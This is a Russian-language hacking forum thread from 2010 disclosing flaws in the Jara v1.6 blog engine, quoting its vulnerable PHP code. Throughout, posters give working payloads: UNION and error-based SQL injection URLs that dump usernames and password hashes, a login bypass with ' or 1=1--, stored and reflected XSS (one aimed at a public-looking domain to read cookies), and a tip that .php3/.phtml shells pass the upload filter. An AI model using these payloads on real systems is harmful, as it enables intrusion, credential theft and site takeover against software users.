Blog Jara v1.6

Discussion in 'Веб-уязвимости' started by nikp, 6 Apr 2010.

  1. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Jara v1.6 - 1st March 2010
    http://jara.xantiz.com/download.html

    category.php
    PHP:
            @$categoryid $_REQUEST["id"];
            
    $category jara_get_category($categoryid);
            
    jara_page_start("Category: ".$category["title"]);
            
    $query "select * from jara_posts where categoryid = '$categoryid'";
    SQL
    mq=off
    http://localhost/jarav16/category.php?id=-1'+union+select+1,version(),3+--+

    ----------------------

    view.php
    PHP:
            session_start();
            
    $id $_REQUEST["id"];
            if(isset(
    $_POST["name"])) {
                
    $name $_POST["name"];
                
    $website $_POST["website"];
                
    $comment $_POST["comment"];
                if(
    substr($website04) != "http") {
                    
    $website "javascript:;";
                }
                
    $name htmlspecialchars($name);
                
    $comment strip_tags($comment);
                if(!
    get_magic_quotes_gpc()) {
                    
    $name addslashes($name);
                    
    $website addslashes($website);
                    
    $comment addslashes($comment);
                }
                if(
    strlen($name) > 64) {
                    
    $name substr($name060) . "...";
                }
                if(!empty(
    $name) && !empty($comment) && $_POST["security"] == $_SESSION["result"]) {
                
                    @
    jara_db_query("insert into jara_comments values('0', '$id', '$name', '$website', '$comment', '".time()."')");
    $id не фильтруется, при mq=off, можно провести SQL injection + acttive XSS.
    Из-за капчи удобнее использовать FireFox + Tamper Data

    http://localhost/jarav16/view.php?id=1
    заполняем
    Your Name:
    Your Comment:
    Security Question:
    и в Tamper Data правим id
    id=1','Guest','','Hi!<script>alert(121212);</script>',1270547738) -- 1

    По адресу http://localhost/jarav16/view.php?id=1 имеем alert.


    ----------------------

    page.php
    PHP:
            $id $_REQUEST["id"];
            
    $result jara_db_query("select * from jara_pages where id = '$id' limit 1");
    SQL
    mq=off
    http://localhost/jarav16/page.php?id=1'+union+select+1,username,unhex(hex(password)),4+from+jara_users+--+

    Хеш хранится в формате SHA1

    ----------------------

    В админке:
    admin/upload.php
    PHP:
        if(is_writable("./../uploads/")) {
            if(
    $_FILES["userfile"]["size"] > 0) {
                
    $ext strtolower(end(explode("."basename($_FILES["userfile"]["name"]))));
                if(
    $ext == "php" || $ext == "pl" || $ext == "exe" || $ext == "sh") {
                    echo 
    "<p>You're trying to upload an extension that's not allowed. Please upload it inside a container such as a compressed archive.</p>";
                }
                else {
                    if(
    $_FILES["userfile"]["error"] == 0) {
                        
    $filename $_SESSION["jara_admin"] . "-" strtolower(preg_replace("/[^a-zA-Z0-9]/""-"basename($_FILES["userfile"]["name"]))) . "-" time() . "." strtolower(end(explode("."basename($_FILES["userfile"]["name"]))));
                        if(
    move_uploaded_file($_FILES["userfile"]["tmp_name"], "./../uploads/$filename")) {
                            echo 
    "<p><strong>Your file was uploaded to <a href=\"../uploads/$filename\">$filename</a> in the uploads directory.</strong></p>";
    Shell
    загружаются файлы с расширением .php3, .phtml

    ----------------------
     
    7 people like this.
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    Jara v1.6 - 1st March 2010
    XSS
    /search.php
    PHP:
    ...try {
                
    jara_page_start("Search results");
                
    $term $_REQUEST["term"];
                if(!
    get_magic_quotes_gpc()) {
                    
    $term addslashes($term);...
    PHP:
    ...
    echo 
    "<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";...
    HTML:
    ...<form action="search.php" method="post">
    	<p>
    		Search term: <input type="text" name="term" id="term" /><input type="submit" value="Go" />
    	</p>
    </form>...
    Результат:
    в поле term - xss
     
    #2 Strilo4ka, 7 Apr 2010
    Last edited: 7 Apr 2010
  3. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    SQL inj - Класика жанра!
    Входим в админку Jara v1.6

    /login.php
    PHP:
    require_once("include/jara_fns.php");
        if(isset(
    $_POST["login_action"])) {
            try {
                
    session_start();
                
    $username $_POST["username"];
                
    $password $_POST["password"];
                if(!
    get_magic_quotes_gpc()) {
                    
    $username addslashes($username);
                    
    $password addslashes($password);
                }
                
    $result jara_user_authenticate($_POST["username"], $_POST["password"]);
                if(
    $result == false) {
                    
    jara_page_start("Login failure");
                    echo 
    "<p>\n";
                    echo 
    "\tYou have entered an invalid username or password.<br />\n";
                    echo 
    "\tPlease go back and try again.\n";
                    echo 
    "</p>";
                    
    jara_page_end();
                    exit;
                }
                else {
                    
    header("Location: index.php");
                }
            }
            catch(
    JaraDatabaseException $ex) {
                
    jara_page_start("Login failure");...
    В функцию jara_user_authenticate вставляються $_POST["username"] и $_POST["password"].
    Эта конструкция отдыхает:
    PHP:
    ...$username $_POST["username"];
                
    $password $_POST["password"];
                if(!
    get_magic_quotes_gpc()) {
                    
    $username addslashes($username);
                    
    $password addslashes($password);
                }...

    /include/auth_fns.php
    PHP:
    ...function jara_user_authenticate($username$password) {
            
    $query "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1";
            
    $result jara_db_query($query);
            if(
    $result->num_rows == 0) {
                return 
    false;
            }
            else {
                
    $row $result->fetch_assoc();
                
    $_SESSION["jara_admin"] = $username;
                
    $_SESSION["jara_permissions"] = array($row["permission_posts"], $row["permission_pages"], $row["permission_users"], $row["permission_upload"]);
                return 
    true;
            }
        }...
    Условие:
    mg=off

    Результат:
    <input type="text" id="username" name="username" width="20" />
    в поле username ' or 1=1--[ ]
     
    #3 Strilo4ka, 7 Apr 2010
    Last edited: 7 Apr 2010
    2 people like this.
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    SQL inj
    Jara v1.6

    /admin/delete_category.php
    PHP:
    ...try {
            
    $id $_REQUEST["id"];
            if(
    $id == 1) {
                throw new 
    JaraGeneralException("You cannot the delete the Uncategorized category.");
            }
            
    $query "delete from jara_categories where categoryid = '$id'";
            
    $result jara_db_query($query);...

    /include/db_fns.php

    PHP:
    ...function jara_db_connect() {
            global 
    $jconfig$db_conn;
            if(
    $db_conn == null) {
                @
    $conn = new mysqli($jconfig->mysql_host$jconfig->mysql_username$jconfig->mysql_password$jconfig->mysql_db);
                if(
    mysqli_connect_errno()) {
                    throw new 
    JaraDatabaseException(1mysqli_connect_errno(), mysqli_connect_error());
                }
                
    $db_conn $conn;
                return 
    $conn;
            }
            else {
                return 
    $db_conn;
            }
        }
        
        function 
    jara_db_query($query) {
            
    $conn jara_db_connect();
            
    $result $conn->query($query);
            if(
    $conn->errno) {
                throw new 
    JaraDatabaseException(2$conn->errno$conn->error$query);
            }
            if(
    substr($query06) == "select" || substr($query04) == "show" || substr($query07) == "explain") {
                return 
    $result;
            }
            else {
                return 
    $conn->affected_rows;
            }
        }
    Условие:
    mg=off

    Результат:
    http://localhost/jarav/admin/delete_category.php?id=1[sql]
    http://localhost/jarav/admin/delete_category.php?id=1' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--+

    Также уязвимы другие скрипты!
     
    #4 Strilo4ka, 7 Apr 2010
    Last edited: 7 Apr 2010
    1 person likes this.
  5. Red_EYEs

    Red_EYEs Member

    Joined:
    7 Aug 2009
    Messages:
    32
    Likes Received:
    12
    Reputations:
    11
    http://xantiz.co.cc/blog/view.php?id=8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C%22 Если есть mq то можно и так
     
Loading...